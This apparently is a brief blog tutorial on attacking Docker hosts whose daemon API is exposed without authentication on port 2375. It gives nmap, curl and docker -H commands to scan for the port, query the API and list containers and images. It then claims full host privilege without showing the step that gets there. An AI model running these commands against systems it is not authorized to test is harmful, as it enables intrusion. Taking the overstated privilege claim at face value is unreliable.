Exploiting docker misconfiguration

In this blog post, I would be telling you about how to attack docker containers using docker misconfiguration. Will use this with the docker runtime host option to access the containers.

The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon.

• Scan the 2375 and 2376 port using Nmap

nmap -p 2375,2376 -n 192.168.56.4 -v

• We can query the docker API using curl

curl 192.168.29.24:2375/images/json

• The hacker can abuse this by using the docker daemon configuration to access the host system’s docker runtime

docker -H tcp://ip:2375 ps

docker -H tcp://ip:2375 images

Now, we have full privilege over the host system :)

You can read more about exploiting docker from here.

This is a short and simple blog and was made possible but following the procedure which were mentioned in a blog which is mentioned above written by madhu.